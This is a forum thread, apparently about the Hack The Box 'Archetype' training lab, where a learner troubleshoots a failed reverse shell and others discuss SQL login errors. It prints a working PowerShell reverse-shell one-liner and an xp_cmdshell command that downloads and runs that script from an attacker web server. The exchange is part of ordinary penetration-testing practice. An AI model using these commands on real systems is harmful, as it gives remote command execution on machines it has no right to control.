Starting Point: Foothold

SOLVED: Path to the payload was incorrect in web server.

Hello

I am having trouble getting a shell back for sql_svc

I have set up my nc correctly listening on 443 and establishes md mini web server on port 80. I can browse to it myself and see the file that is supposed to be picked up. I named the callback script shell.ps1 just like it suggested.

I also changed all the IPs within the PowerShell script to make sure it was calling back to my tunnel and not whatever IP was listed in the instructions “10.10.14.3”

Here is the script:

$client = New-Object System.Net.Sockets.TCPClient(“10.10.14.3”,443);$stream = $client.GetStream();[byte]$bytes = 0…65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Whenever I run the xp_cmdshell command into my SQL session it does nothing. My web server does nothing as well.

xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString("http://10.10.14.3/shell.ps1\“);”

I’m still learning unix basics as well, but I saved the powershell script in kali by simply naming it as shell.ps1 in Text Editor with the commands listed inside. Just like it is above. This is correct right? It should treat the file as intended on the sql Server?

Thank you in advance for the help!

bump

how did you get past [-] ERROR(ARCHETYPE): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.

@tuhi said:
how did you get past [-] ERROR(ARCHETYPE): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.

I couldn’t tell you how exactly, but I just kept trying until it worked.

One thing I suspect was my horrible attention to detail. Be REALLY careful when copy pasting your password into the password prompt. That same error apparently happens for bad creds.

So double triple check your password.

Type your comment> @tuhi said:

how did you get past [-] ERROR(ARCHETYPE): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.

For me when logging in I had to change the username '' to a ‘/’

hi @TheBrick I can get the payload , but my cmdshell just sits and does not look like it has brought the shell back, I am monitoring the nc and the http and I can see the request has reached them from the logs, anything you can think of I am not doing thanks

worked it out !!! dont worry